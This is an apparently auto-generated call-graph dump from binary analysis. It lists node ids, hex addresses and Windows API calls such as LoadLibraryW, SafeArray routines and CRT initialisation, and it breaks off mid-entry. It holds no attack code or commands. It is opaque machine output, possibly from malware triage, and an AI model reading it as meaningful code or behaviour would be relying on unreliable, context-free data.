59799->59822 59834 113af48 59799->59834 59800 113aefb 59840 113b6a1 59800->59840 59844 113b6a8 59800->59844 59801 113af3a 59801->59785 59808 113aec7 59807->59808 59813 113af58 2 API calls 59808->59813 59814 113af48 2 API calls 59808->59814 59815 113afa8 2 API calls 59808->59815 59809 113aefb 59811 113b6a1 341 API calls 59809->59811 59812 113b6a8 341 API calls 59809->59812 59810 113af3a 59810->59785 59811->59810 59812->59810 59813->59809 59814->59809 59815->59809 59817 113af72 59816->59817 59821 113afa8 2 API calls 59817->59821 59848 113b0ba 59817->59848 59852 113afb8 59817->59852 59818 113af7d 59818->59800 59821->59818 59823 113afc0 59822->59823 59824 113af4a 59823->59824 59825 113afc2 59823->59825 59831 113b0ba LoadLibraryW 59824->59831 59832 113afb8 2 API calls 59824->59832 59833 113afa8 2 API calls 59824->59833 59826 11399b0 LoadLibraryW 59825->59826 59830 113b023 59826->59830 59827 113af7d 59827->59800 59828 113b151 59828->59800 59829 11399bc LoadLibraryW 59829->59830 59830->59828 59830->59829 59831->59827 59832->59827 59833->59827 59835 113af4a 59834->59835 59837 113b0ba LoadLibraryW 59835->59837 59838 113afb8 2 API calls 59835->59838 59839 113afa8 2 API calls 59835->59839 59836 113af7d 59836->59800 59837->59836 59838->59836 59839->59836 59841 113b6a8 59840->59841 59866 6f052ed0 59841->59866 59842 113b733 59842->59801 59845 113b6ac 59844->59845 59847 6f052ed0 341 API calls 59845->59847 59846 113b733 59846->59801 59847->59846 59850 113b06a 59848->59850 59849 113b151 59849->59818 59850->59849 59858 11399bc 59850->59858 59853 113afd4 59852->59853 59862 11399b0 59853->59862 59855 113b151 59855->59818 59856 11399bc LoadLibraryW 59857 113b023 59856->59857 59857->59855 59857->59856 59859 113b170 LoadLibraryW 59858->59859 59861 113b21c 59859->59861 59861->59850 59863 113b170 LoadLibraryW 59862->59863 59865 113b21c 59863->59865 59865->59857 59867 6f052f09 59866->59867 59887 6f053006 collate 59866->59887 59868 6f089bb5 77 API calls 59867->59868 59869 6f052f31 59868->59869 59870 6f089bb5 77 API calls 59869->59870 59871 6f052f54 59870->59871 59872 6f035050 77 API calls 59871->59872 59873 6f052f6e 59872->59873 59874 6f089bb5 77 API calls 59873->59874 59875 6f052f75 59874->59875 59876 6f035050 77 API calls 59875->59876 59877 6f052f8f 59876->59877 59878 6f089bb5 77 API calls 59877->59878 59879 6f052f96 59878->59879 59880 6f035050 77 API calls 59879->59880 59881 6f052fb0 59880->59881 59882 6f089bb5 77 API calls 59881->59882 59883 6f052fb7 59882->59883 59884 6f035050 77 API calls 59883->59884 59885 6f052fd1 59884->59885 59886 6f0316b0 341 API calls 59885->59886 59886->59887 59887->59842 59888 6f049357 59889 6f049368 59888->59889 59890 6f0469c0 11 API calls 59889->59890 59896 6f0493ac 59890->59896 59891 6f048739 59892 6f04ae62 SafeArrayDestroy 59891->59892 59893 6f04ae68 59891->59893 59892->59893 59894 6f04ae72 SafeArrayDestroy 59893->59894 59895 6f04ae7b 59893->59895 59894->59895 59897 6f04ae85 SafeArrayDestroy 59895->59897 59898 6f04ae8e 59895->59898 59896->59891 59899 6f0469c0 11 API calls 59896->59899 59897->59898 59900 6f04aea1 59898->59900 59901 6f04ae98 SafeArrayDestroy 59898->59901 59908 6f04943a 59899->59908 59902 6f04aeb4 59900->59902 59903 6f04aeab SafeArrayDestroy 59900->59903 59901->59900 59904 6f04aec7 59902->59904 59905 6f04aebe SafeArrayDestroy 59902->59905 59903->59902 59906 6f08948b __cftof_l 5 API calls 59904->59906 59905->59904 59907 6f04aef5 59906->59907 59908->59891 59909 6f0494b1 SafeArrayGetLBound SafeArrayGetUBound 59908->59909 59910 6f049658 59909->59910 59915 6f0494ef 59909->59915 60032 6f03d920 59910->60032 59912 6f0494fd SafeArrayGetElement 59912->59891 59912->59915 59913 6f04840e 59913->59891 60025 6f03dfb0 59913->60025 59915->59891 59915->59910 59915->59912 59915->59913 59916 6f048441 59916->59891 59918 6f0484af SafeArrayGetLBound SafeArrayGetUBound 59916->59918 59917 6f04968f 59917->59891 59925 6f049794 SafeArrayGetLBound SafeArrayGetUBound 59917->59925 59919 6f048616 59918->59919 59920 6f0484ed SafeArrayGetElement 59918->59920 59921 6f03dfb0 24 API calls 59919->59921 59920->59891 59930 6f048518 59920->59930 59922 6f04862b 59921->59922 59922->59891 59923 6f03dfb0 24 API calls 59922->59923 59924 6f04864b 59923->59924 59924->59891 59926 6f03dfb0 24 API calls 59924->59926 59929 6f0497d2 59925->59929 59938 6f049c5e 59925->59938 59927 6f04866b 59926->59927 59927->59891 59933 6f03dfb0 24 API calls 59927->59933 59928 6f043a90 8 API calls 59928->59930 59929->59913 59931 6f0497e3 SafeArrayGetElement 59929->59931 59929->59938 59948 6f043a90 8 API calls 59929->59948 59930->59919 59930->59920 59930->59928 59931->59891 59931->59929 59932 6f03d920 3 API calls 59935 6f049cf8 59932->59935 59934 6f04868a 59933->59934 59934->59891 59936 6f03dfb0 24 API calls 59934->59936 59935->59891 59942 6f049d4f SafeArrayGetLBound SafeArrayGetUBound 59935->59942 59937 6f0486aa 59936->59937 59937->59891 59939 6f0469c0 11 API calls 59937->59939 59938->59932 59940 6f0486cf 59939->59940 59940->59891 59941 6f0469c0 11 API calls 59940->59941 59943 6f0486f5 59941->59943 59944 6f049ec7 59942->59944 59952 6f049d8d 59942->59952 59943->59891 59945 6f0469c0 11 API calls 59943->59945 59946 6f03d920 3 API calls 59944->59946 59945->59891 59949 6f049f09 59946->59949 59947 6f049da0 SafeArrayGetElement 59947->59891 59947->59952 59948->59929 59949->59891 59950 6f03d920 3 API calls 59949->59950 59953 6f049f8b 59950->59953 59951 6f043a90 8 API calls 59951->59952 59952->59944 59952->59947 59952->59951 59953->59891 59954 6f03d920 3 API calls 59953->59954 59955 6f04a01f 59954->59955 59955->59891 59956 6f03d920 3 API calls 59955->59956 59957 6f04a09b 59956->59957 59957->59891 59958 6f04a1ac SafeArrayGetLBound SafeArrayGetUBound 59957->59958 59959 6f04a7b3 59958->59959 59974 6f04a1ea 59958->59974 59960 6f03d920 3 API calls 59959->59960 59962 6f04a7ce 59960->59962 59961 6f04a1fd SafeArrayGetElement 59964 6f04a815 59961->59964 59961->59974 59962->59891 59963 6f03d920 3 API calls 59962->59963 59963->59964 59964->59891 60040 6f0464d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 59964->60040 59965 6f043a90 8 API calls 59965->59974 59967 6f04a91d 59967->59891 59968 6f0464d0 109 API calls 59967->59968 59969 6f04a950 59968->59969 59969->59891 59970 6f0464d0 109 API calls 59969->59970 59971 6f04a983 59970->59971 59971->59891 59972 6f0464d0 109 API calls 59971->59972 59973 6f04a9b6 59972->59973 59973->59891 59975 6f0464d0 109 API calls 59973->59975 59974->59959 59974->59961 59974->59965 59976 6f04a9e9 59975->59976 59976->59891 59977 6f0464d0 109 API calls 59976->59977 59978 6f04aa1c 59977->59978 59978->59891 59979 6f0464d0 109 API calls 59978->59979 59980 6f04aa4f 59979->59980 59980->59891 59981 6f0464d0 109 API calls 59980->59981 59982 6f04aa82 59981->59982 59982->59891 59983 6f0464d0 109 API calls 59982->59983 59984 6f04aab5 59983->59984 59984->59891 59985 6f0464d0 109 API calls 59984->59985 59986 6f04aae8 59985->59986 59986->59891 59987 6f0464d0 109 API calls 59986->59987 59988 6f04ab1e 59987->59988 59988->59891 59989 6f04abd0 59988->59989 59993 6f04ac5a 59988->59993 60054 6f042970 59989->60054 60082 6f04d790 77 API calls 3 library calls 59993->60082 59995 6f04ac37 59995->59891 60083 6f031690 77 API calls 59995->60083 59997 6f04ad36 60084 6f0350c0 77 API calls 59997->60084 59999 6f04ad4d 60000 6f089bb5 77 API calls 59999->60000 60001 6f04ad5d 60000->60001 60002 6f035050 77 API calls 60001->60002 60003 6f04ad77 60002->60003 60085 6f0350c0 77 API calls 60003->60085 60005 6f04ad82 60006 6f089bb5 77 API calls 60005->60006 60007 6f04ad89 60006->60007 60008 6f035050 77 API calls 60007->60008 60009 6f04ada7 60008->60009 60010 6f089bb5 77 API calls 60009->60010 60011 6f04adae 60010->60011 60012 6f035050 77 API calls 60011->60012 60013 6f04adcc 60012->60013 60086 6f0350c0 77 API calls 60013->60086 60015 6f04add7 60016 6f089bb5 77 API calls 60015->60016 60017 6f04ade1 60016->60017 60018 6f035050 77 API calls 60017->60018 60019 6f04adfb 60018->60019 60087 6f0350c0 77 API calls 60019->60087 60021 6f04ae06 60088 6f0350c0 77 API calls 60021->60088 60023 6f04ae11 60089 6f032a40 341 API calls 60023->60089 60026 6f03dfe5 60025->60026 60027 6f03dfef SafeArrayGetLBound SafeArrayGetUBound 60025->60027 60026->60027 60029 6f03e018 60027->60029 60030 6f03e065 60027->60030 60028 6f03e020 SafeArrayGetElement 60028->60029 60028->60030 60029->60028 60029->60030 60090 6f04af00 60029->60090 60030->59916 60033 6f03d936 60032->60033 60034 6f03d944 SafeArrayCreateVector 60032->60034 60033->60034 60035 6f03d981 60034->60035 60036 6f03d95a 60034->60036 60038 6f03d9d5 60035->60038 60039 6f03d9ce SafeArrayDestroy 60035->60039 60036->60035 60037 6f03d960 SafeArrayPutElement 60036->60037 60037->60035 60037->60036 60038->59917 60039->60038 60041 6f046554 60040->60041 60042 6f04655c SafeArrayPutElement VariantClear 60040->60042 60041->60042 60043 6f046584 SafeArrayPutElement VariantClear 60042->60043 60053 6f046655 60042->60053 60047 6f0465cd 60043->60047 60043->60053 60045 6f046665 SafeArrayDestroy 60046 6f04666c VariantClear VariantClear VariantClear 60045->60046 60046->59967 60047->60053 60117 6f03db30 VariantInit SafeArrayCreateVector SafeArrayPutElement 60047->60117 60049 6f04663a 60049->60053 60121 6f0456b0 60049->60121 60053->60045 60053->60046 60065 6f0429c3 60054->60065 60055 6f042d21 60055->59891 60069 6f04d2e0 60055->60069 60056 6f0429ee SafeArrayGetLBound SafeArrayGetUBound 60058 6f042a20 SafeArrayGetElement 60056->60058 60062 6f042c53 60056->60062 60057 6f042d1a SafeArrayDestroy 60057->60055 60058->60062 60058->60065 60059 6f042ab6 VariantInit 60059->60065 60060 6f042b3a VariantInit 60060->60065 60061 6f042c8b VariantClear VariantClear 60061->60062 60062->60055 60062->60057 60063 6f042d3a VariantClear VariantClear VariantClear 60063->60062 60065->60055 60065->60056 60065->60058 60065->60059 60065->60060 60065->60061 60065->60062 60065->60063 60066 6f042cb6 VariantClear VariantClear VariantClear 60065->60066 60067 6f042bf9 VariantClear VariantClear VariantClear 60065->60067 60139 6f053160 60065->60139 60066->60062 60067->60065 60070 6f089bb5 77 API calls 60069->60070 60071 6f04d32f 60070->60071 60072 6f04d33e 60071->60072 60073 6f04d3db 60071->60073 60165 6f04c530 VariantInit VariantInit SafeArrayCreateVector 60072->60165 60176 6f089533 66 API calls std::exception::_Copy_str 60073->60176 60075 6f04d3ed 60177 6f08ac75 RaiseException 60075->60177 60077 6f04d404 60080 6f08948b __cftof_l 5 API calls 60081 6f04d3d5 60080->60081 60081->59995 60082->59995 60083->59997 60084->59999 60085->60005 60086->60015 60087->60021 60088->60023 60089->59891 60092 6f04af32 60090->60092 60091 6f04afda 60091->60029 60092->60091 60096 6f043f10 60092->60096 60106 6f043f4f 60096->60106 60097 6f043f6f SafeArrayGetLBound SafeArrayGetUBound 60098 6f0440e2 60097->60098 60097->60106 60099 6f044122 SafeArrayDestroy 60098->60099 60100 6f044129 60098->60100 60099->60100 60100->60091 60108 6f04c410 60100->60108 60101 6f043fb2 VariantInit SafeArrayGetElement 60102 6f044163 VariantClear 60101->60102 60101->60106 60102->60098 60103 6f0440bc VariantClear 60103->60098 60103->60101 60104 6f044142 VariantClear 60104->60098 60106->60097 60106->60098 60106->60101 60106->60103 60106->60104 60107 6f0440fc VariantClear 60106->60107 60107->60098 60107->60106 60109 6f04c449 60108->60109 60110 6f04c46e SafeArrayGetLBound SafeArrayGetUBound 60109->60110 60111 6f04c4f0 60109->60111 60110->60111 60116 6f04c499 60110->60116 60112 6f04c511 SafeArrayDestroy 60111->60112 60113 6f04c518 60111->60113 60112->60113 60113->60091 60114 6f04c4a2 SafeArrayGetElement 60114->60111 60114->60116 60115 6f043a90 8 API calls 60115->60116 60116->60111 60116->60114 60116->60115 60118 6f03db8c 60117->60118 60119 6f03dbf0 SafeArrayDestroy 60118->60119 60120 6f03dbf7 VariantClear 60118->60120 60119->60120 60120->60049 60122 6f0456f4 60121->60122 60123 6f0456e0 60121->60123 60126 6f045744 60122->60126 60127 6f04570d VariantInit VariantCopy 60122->60127 60137 6f0457c0 81 API calls std::_Xinvalid_argument 60122->60137 60123->60122 60136 6f0457c0 81 API calls std::_Xinvalid_argument 60123->60136 60128 6f046880 VariantInit VariantInit 60126->60128 60127->60122 60127->60126 60138 6f0891e1 60128->60138 60130 6f0468cd SafeArrayCreateVector SafeArrayPutElement VariantClear 60131 6f046913 SafeArrayPutElement 60130->60131 60134 6f04692d 60130->60134 60131->60134 60132 6f046987 60135 6f046994 VariantClear VariantClear 60132->60135 60133 6f046980 SafeArrayDestroy 60133->60132 60134->60132 60134->60133 60135->60053 60136->60122 60137->60122 60141 6f053173 _memset 60139->60141 60140 6f05318c 60140->60065 60141->60140 60144 6f0251d0 60141->60144 60147 6f022a50 60144->60147 60160 6f024100 77 API calls 2 library calls 60147->60160 60149 6f022aab 60161 6f071160 71 API calls __cftof_l 60149->60161 60151 6f022ade 60162 6f071160 71 API calls __cftof_l 60151->60162 60153 6f022aea 60163 6f024c20 81 API calls __cftof_l 60153->60163 60155 6f022af9 60164 6f023950 81 API calls 60155->60164 60157 6f022b2d collate 60158 6f08948b __cftof_l 5 API calls 60157->60158 60159 6f022bdb 60158->60159 60159->60065 60160->60149 60161->60151 60162->60153 60163->60155 60164->60157 60166 6f04c5a4 60165->60166 60167 6f04c5ac SafeArrayPutElement VariantClear 60165->60167 60166->60167 60171 6f04c5cf 60167->60171 60174 6f04c7e4 60167->60174 60168 6f04c7f7 VariantClear VariantClear 60170 6f04c817 60168->60170 60169 6f04c7f0 SafeArrayDestroy 60169->60168 60170->60080 60172 6f04c7d9 60171->60172 60171->60174 60181 6f08919e 67 API calls 3 library calls 60171->60181 60178 6f04df70 60172->60178 60174->60168 60174->60169 60176->60075 60177->60077 60182 6f04d410 60178->60182 60180 6f04df80 60180->60174 60181->60172 60183 6f04d472 VariantInit VariantInit VariantInit 60182->60183 60184 6f04d44e 60182->60184 60196 6f04d470 _memmove 60183->60196 60184->60180 60185 6f04d704 VariantClear VariantClear VariantClear 60187 6f04d75d 60185->60187 60185->60196 60186 6f089d66 _malloc 66 API calls 60186->60196 60187->60180 60188 6f04d579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 60188->60196 60189 6f04d5ec SafeArrayPutElement 60189->60196 60190 6f04d5d6 SafeArrayUnaccessData 60190->60189 60191 6f04d633 SafeArrayPutElement VariantClear 60191->60196 60192 6f04d6fa SafeArrayDestroy 60192->60196 60194 6f03db30 5 API calls 60194->60196 60195 6f0456b0 83 API calls 60195->60196 60196->60183 60196->60185 60196->60186 60196->60187 60196->60188 60196->60189 60196->60190 60196->60191 60196->60192 60196->60194 60196->60195 60197 6f046880 9 API calls 60196->60197 60198 6f089d2c 66 API calls 2 library calls 60196->60198 60197->60196 60198->60196 58486 6f08a42d 58487 6f08a438 58486->58487 58491 6f08a4b8 _doexit 58486->58491 58487->58491 58492 6f08a468 58487->58492 58494 6f08a2ab 58487->58494 58489 6f08a498 58490 6f08a2ab __CRT_INIT@12 148 API calls 58489->58490 58489->58491 58490->58491 58492->58489 58492->58491 58493 6f08a2ab __CRT_INIT@12 148 API calls 58492->58493 58493->58489 58495 6f08a2b7 _doexit 58494->58495 58496 6f08a339 58495->58496 58497 6f08a2bf 58495->58497 58499 6f08a39a 58496->58499 58500 6f08a33f 58496->58500 58546 6f08e904 HeapCreate 58497->58546 58501 6f08a3f8 58499->58501 58502 6f08a39f 58499->58502 58505 6f08a35d 58500->58505 58514 6f08a2c8 _doexit 58500->58514 58614 6f08d4e7 58500->58614 58501->58514 58637 6f08ec2f 79 API calls __freefls@4 58501->58637 58626 6f08e948 TlsGetValue 58502->58626 58503 6f08a2c4 58503->58514 58547 6f08ec9d GetModuleHandleW 58503->58547 58506 6f08a371 58505->58506 58622 6f08dd67 67 API calls std::exception::_Tidy 58505->58622 58625 6f08a384 70 API calls __mtterm 58506->58625 58511 6f08a2d4 __RTC_Initialize 58516 6f08a2d8 58511->58516 58523 6f08a2e4 GetCommandLineA 58511->58523 58514->58492 58617 6f08e922 HeapDestroy 58516->58617 58517 6f08a367 58623 6f08e97c 70 API calls std::exception::_Tidy 58517->58623 58519 6f08a3bc DecodePointer 58524 6f08a3d1 58519->58524 58522 6f08a36c 58624 6f08e922 HeapDestroy 58522->58624 58572 6f08fc46 GetEnvironmentStringsW 58523->58572 58527 6f08a3ec 58524->58527 58528 6f08a3d5 58524->58528 58636 6f089d2c 66 API calls 2 library calls 58527->58636 58635 6f08e9b9 66 API calls 4 library calls 58528->58635 58533 6f08a3dc GetCurrentThreadId 58533->58514 58535 6f08a302 58618 6f08e97c 70 API calls std::exception::_Tidy 58535->58618 58538 6f08a30e 58539 6f08a322 58538->58539 58598 6f08f915 58538->58598 58545 6f08a327 58539->58545 58621 6f08dd67 67 API calls std::exception::_Tidy 58539->58621 58543 6f08a337 58543->58535 58545->58514 58546->58503 58548 6f08ecba GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58547->58548 58549 6f08ecb1 58547->58549 58550 6f08ed04 TlsAlloc 58548->58550 58638 6f08e97c 70 API calls std::exception::_Tidy 58549->58638 58554 6f08ed52 TlsSetValue 58550->58554 58556 6f08ee13 58550->58556 58552 6f08ecb6 58552->58511 58555 6f08ed63 58554->58555 58554->58556 58639 6f08d2a3 RtlEncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 58555->58639 58556->58511 58558 6f08ed68 EncodePointer EncodePointer EncodePointer EncodePointer 58640 6f0922be InitializeCriticalSectionAndSpinCount 58558->58640 58560 6f08eda7 58561 6f08edab DecodePointer 58560->58561 58562 6f08ee0e 58560->58562 58564 6f08edc0 58561->58564 58642 6f08e97c 70 API calls std::exception::_Tidy 58562->58642 58564->58562 58565 6f08cb28 __calloc_crt 66 API calls 58564->58565 58566 6f08edd6 58565->58566 58566->58562 58567 6f08edde DecodePointer 58566->58567 58568 6f08edef 58567->58568 58568->58562 58569 6f08edf3 58568->58569 58641 6f08e9b9 66 API calls 4 library calls 58569->58641 58571 6f08edfb GetCurrentThreadId 58571->58556 58573 6f08a2f4 58572->58573 58574 6f08fc62 WideCharToMultiByte 58572->58574 58585 6f08db22 GetStartupInfoW 58573->58585 58576 6f08fccf FreeEnvironmentStringsW 58574->58576 58577 6f08fc97 58574->58577 58576->58573 58643 6f08cae3 66 API calls _malloc 58577->58643 58579 6f08fc9d 58579->58576 58580 6f08fca5 WideCharToMultiByte 58579->58580 58581 6f08fcc3 FreeEnvironmentStringsW 58580->58581 58582 6f08fcb7 58580->58582 58581->58573 58644 6f089d2c 66 API calls 2 library calls 58582->58644 58584 6f08fcbf 58584->58581 58586 6f08cb28 __calloc_crt 66 API calls 58585->58586 58593 6f08db40 58586->58593 58587 6f08dcb5 58588 6f08dceb GetStdHandle 58587->58588 58589 6f08dd4f SetHandleCount 58587->58589 58591 6f08dcfd GetFileType 58587->58591 58596 6f08dd23 InitializeCriticalSectionAndSpinCount 58587->58596 58588->58587 58597 6f08a2fe 58589->58597 58590 6f08cb28 __calloc_crt 66 API calls 58590->58593 58591->58587 58592 6f08dc35 58592->58587 58594 6f08dc6c InitializeCriticalSectionAndSpinCount 58592->58594 58595 6f08dc61 GetFileType 58592->58595 58593->58587 58593->58590 58593->58592 58593->58597 58594->58592 58594->58597 58595->58592 58595->58594 58596->58587 58596->58597 58597->58535 58619 6f08fb8b 94 API calls 3 library calls 58597->58619 58599 6f08f91e 58598->58599 58602 6f08f923 _strlen 58598->58602 58645 6f08f4de 93 API calls __setmbcp 58599->58645 58601 6f08cb28 __calloc_crt 66 API calls 58608 6f08f958 _strlen 58601->58608 58602->58601 58605 6f08a317 58602->58605 58603 6f08f9a7 58647 6f089d2c 66 API calls 2 library calls 58603->58647 58605->58539 58620 6f08d2fa 77 API calls 4 library calls 58605->58620 58606 6f08cb28 __calloc_crt 66 API calls 58606->58608 58607 6f08f9cd 58648 6f089d2c 66 API calls 2 library calls 58607->58648 58608->58603 58608->58605 58608->58606 58608->58607 58611 6f08f9e4 58608->58611 58646 6f08d019 66 API calls __cftof_l 58608->58646 58649 6f08b26d 10 API calls __call_reportfault 58611->58649 58613 6f08f9f0 58650 6f08d391 58614->58650 58616 6f08d4f2 58616->58505 58617->58514 58618->58516 58619->58538 58620->58539 58621->58543 58622->58517 58623->58522 58624->58506 58625->58514 58627 6f08a3a4 58626->58627 58628 6f08e95d DecodePointer TlsSetValue 58626->58628 58629 6f08cb28 58627->58629 58628->58627 58632 6f08cb31 58629->58632 58631 6f08a3b0 58631->58514 58631->58519 58632->58631 58633 6f08cb4f Sleep 58632->58633 58677 6f0925c3 58632->58677 58634 6f08cb64 58633->58634 58634->58631 58634->58632 58635->58533 58636->58514 58637->58514 58638->58552 58639->58558 58640->58560 58641->58571 58642->58556 58643->58579 58644->58584 58645->58602 58646->58608 58647->58605 58648->58605 58649->58613 58651 6f08d39d _doexit 58650->58651 58652 6f092438 __lock 61 API calls 58651->58652 58653 6f08d3a4 58652->58653 58655 6f08d3cf RtlDecodePointer 58653->58655 58660 6f08d44e 58653->58660 58657 6f08d3e6 DecodePointer 58655->58657 58655->58660 58656 6f08d49c 58658 6f08d4cb _doexit 58656->58658 58674 6f09235f LeaveCriticalSection 58656->58674 58669 6f08d3f9 58657->58669 58658->58616 58673 6f08d4bc LeaveCriticalSection _doexit 58660->58673 58661 6f08d4b3 58663 6f08d4bc 58661->58663 58675 6f08d279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 58661->58675 58665 6f08d4c9 58663->58665 58676 6f09235f LeaveCriticalSection 58663->58676 58665->58616 58667 6f08d410 DecodePointer 58672 6f08e936 RtlEncodePointer 58667->58672 58669->58660 58669->58667 58670 6f08d41f DecodePointer DecodePointer 58669->58670 58671 6f08e936 RtlEncodePointer 58669->58671 58670->58669 58671->58669 58672->58669 58673->58656 58674->58661 58676->58665 58678 6f0925cf 58677->58678 58683 6f0925ea 58677->58683 58679 6f0925db 58678->58679 58678->58683 58686 6f08d7d8 66 API calls __getptd_noexit 58679->58686 58680 6f0925fd RtlAllocateHeap 58682 6f092624 58680->58682 58680->58683 58682->58632 58683->58680 58683->58682 58687 6f08c86e DecodePointer 58683->58687 58684 6f0925e0 58684->58632 58686->58684 58687->58683 58688 5954c50 58689 5954c72 58688->58689 58693 59551f8 58689->58693 58698 5955208 58689->58698 58690 5954c9a 58694 5955208 58693->58694 58703 5940f14 58694->58703 58708 5940eb3 58694->58708 58695 5955249 58695->58690 58699 595520c 58698->58699 58701 5940f14 341 API calls 58699->58701 58702 5940eb3 341 API calls 58699->58702 58700 5955249 58700->58690 58701->58700 58702->58700 58704 5940f15 58703->58704 58705 59419c1 58704->58705 58713 59552b0 58704->58713 58717 59552b8 58704->58717 58705->58695 58709 5940eb8 58708->58709 58710 59419c1 58709->58710 58711 59552b0 341 API calls 58709->58711 58712 59552b8 341 API calls 58709->58712 58710->58695 58711->58710 58712->58710 58714 5955323 58713->58714 58721 6f053eb0 58714->58721 58715 595534c 58715->58705 58718 5955323 58717->58718 58720 6f053eb0 341 API calls 58718->58720 58719 595534c 58719->58705 58720->58719 58722 6f089bb5 77 API calls 58721->58722 58723 6f053f11 58722->58723 58724 6f089bb5 77 API calls 58723->58724 58725 6f053f36 58724->58725 58762 6f035050 58725->58762 58727 6f053f50 58728 6f089bb5 77 API calls 58727->58728 58729 6f053f57 58728->58729 58730 6f035050 77 API calls 58729->58730 58731 6f053f71 58730->58731 58732 6f089bb5 77 API calls 58731->58732 58733 6f053f78 58732->58733 58734 6f035050 77 API calls 58733->58734 58735 6f053f92 58734->58735 58736 6f089bb5 77 API calls 58735->58736 58737 6f053fab 58736->58737 58738 6f054031 58737->58738 58739 6f053fb2 58737->58739 58836 6f089533 66 API calls std::exception::_Copy_str 58738->58836 58770 6f0316b0 58739->58770 58742 6f054047 58837 6f08ac75 RaiseException 58742->58837 58744 6f05405e 58745 6f089bb5 77 API calls 58744->58745 58746 6f0540b5 58745->58746 58748 6f089bb5 77 API calls 58746->58748 58747 6f053fdc collate 58747->58715 58749 6f0540d8 58748->58749 58750 6f035050 77 API calls 58749->58750 58751 6f0540f2 58750->58751 58752 6f089bb5 77 API calls 58751->58752 58753 6f0540f9 58752->58753 58754 6f035050 77 API calls 58753->58754 58755 6f054113 58754->58755 58756 6f089bb5 77 API calls 58755->58756 58757 6f05411a 58756->58757 58758 6f035050 77 API calls 58757->58758 58759 6f054134 58758->58759 58760 6f0316b0 341 API calls 58759->58760 58761 6f054169 collate 58760->58761 58761->58715 58763 6f035091 58762->58763 58764 6f03505d 58762->58764 58766 6f03509d 58763->58766 58839 6f035110 77 API calls std::_Xinvalid_argument 58763->58839 58764->58763 58765 6f035066 58764->58765 58768 6f03507a 58765->58768 58838 6f035110 77 API calls std::_Xinvalid_argument 58765->58838 58766->58727 58768->58727 58771 6f089bb5 77 API calls 58770->58771 58772 6f031706 58771->58772 58773 6f031711 58772->58773 58774 6f031c39 58772->58774 58840 6f032d70 58773->58840 58909 6f089533 66 API calls std::exception::_Copy_str 58774->58909 58777 6f031c48 58910 6f08ac75 RaiseException 58777->58910 58780 6f031c5d 58781 6f032d70 77 API calls 58782 6f031788 58781->58782 58783 6f032d70 77 API calls 58782->58783 58784 6f0317a9 58783->58784 58785 6f032d70 77 API calls 58784->58785 58786 6f0317ca 58785->58786 58787 6f032d70 77 API calls 58786->58787 58788 6f0317e6 58787->58788 58789 6f032d70 77 API calls 58788->58789 58790 6f03182f 58789->58790 58791 6f032d70 77 API calls 58790->58791 58792 6f031878 58791->58792 58793 6f032d70 77 API calls 58792->58793 58794 6f0318c6 58793->58794 58795 6f032d70 77 API calls 58794->58795 58796 6f0318e7 58795->58796 58797 6f032d70 77 API calls 58796->58797 58798 6f031900 58797->58798 58799 6f032d70 77 API calls 58798->58799 58800 6f031946 58799->58800 58801 6f032d70 77 API calls 58800->58801 58802 6f03198f 58801->58802 58803 6f032d70 77 API calls 58802->58803 58804 6f0319d3 58803->58804 58805 6f032d70 77 API calls 58804->58805 58806 6f031a05 58805->58806 58848 6f033b30 58806->58848 58809 6f032d70 77 API calls 58811 6f031a21 58809->58811 58810 6f032d70 77 API calls 58812 6f031a82 58810->58812 58811->58810 58857 6f033bd0 58812->58857 58815 6f032d70 77 API calls 58816 6f031a9e 58815->58816 58817 6f032d70 77 API calls 58816->58817 58818 6f031aec 58817->58818 58866 6f032a80 58818->58866 58820 6f031b4c 58822 6f031b62 58820->58822 58906 6f08919e 67 API calls 3 library calls 58820->58906 58821 6f031b58 58907 6f089125 67 API calls 2 library calls 58821->58907 58890 6f0542e0 58822->58890 58894 6f0369e0 58822->58894 58898 6f036850 58822->58898 58902 6f0530c0 58822->58902 58826 6f031b6d collate 58908 6f033530 67 API calls 58826->58908 58827 6f031b00 58827->58820 58827->58821 58827->58826 58872 6f032e60 58827->58872 58880 6f034640 58827->58880 58887 6f034750 58827->58887 58829 6f031ba1 collate 58829->58747 58836->58742 58837->58744 58838->58768 58839->58766 58841 6f032db8 58840->58841 58846 6f032e0d 58841->58846 58911 6f025a30 58841->58911 58843 6f032e02 58925 6f033cc0 67 API calls 58843->58925 58845 6f08948b __cftof_l 5 API calls 58847 6f031746 58845->58847 58846->58845 58847->58781 58849 6f033b3d 58848->58849 58850 6f089bb5 77 API calls 58849->58850 58851 6f033b6f 58850->58851 58852 6f031a0c 58851->58852 58930 6f089533 66 API calls std::exception::_Copy_str 58851->58930 58852->58809 58854 6f033bae 58931 6f08ac75 RaiseException 58854->58931 58856 6f033bc3 58858 6f033bdd 58857->58858 58859 6f089bb5 77 API calls 58858->58859 58860 6f033c0f 58859->58860 58861 6f031a89 58860->58861 58932 6f089533 66 API calls std::exception::_Copy_str 58860->58932 58861->58815 58863 6f033c4e 58933 6f08ac75 RaiseException 58863->58933 58865 6f033c63 58867 6f032ae6 58866->58867 58868 6f032acd 58866->58868 58867->58827 58869 6f032adf 58868->58869 58934 6f0890d8 67 API calls 2 library calls 58868->58934 58935 6f0331e0 77 API calls 2 library calls 58869->58935 58874 6f032ea8 58872->58874 58873 6f025a30 77 API calls 58875 6f032ef2 58873->58875 58874->58873 58879 6f032efd 58874->58879 58936 6f033cc0 67 API calls 58875->58936 58877 6f08948b __cftof_l 5 API calls 58878 6f032f43 58877->58878 58878->58827 58879->58877 58881 6f034687 58880->58881 58882 6f03466e 58880->58882 58937 6f025450 58881->58937 58882->58827 58884 6f034690 58968 6f032b70 77 API calls 58884->58968 58886 6f0346ab 58886->58827 58983 6f032150 58887->58983 58889 6f03475f 58889->58827 58891 6f05431d 58890->58891 58892 6f0542fe 58890->58892 58891->58826 58998 6f0362c0 58892->58998 58895 6f036a1f 58894->58895 58896 6f0369fe 58894->58896 58895->58826 59025 6f039110 58896->59025 58899 6f036890 58898->58899 58900 6f03686e 58898->58900 58899->58826 59151 6f038bc0 58900->59151 58903 6f0530f8 58902->58903 58904 6f0530de 58902->58904 58903->58826 59335 6f035fa0 58904->59335 58906->58821 58907->58822 58908->58829 58909->58777 58910->58780 58912 6f089bb5 77 API calls 58911->58912 58913 6f025a64 58912->58913 58914 6f025a72 58913->58914 58926 6f089533 66 API calls std::exception::_Copy_str 58913->58926 58914->58843 58916 6f025ad0 58927 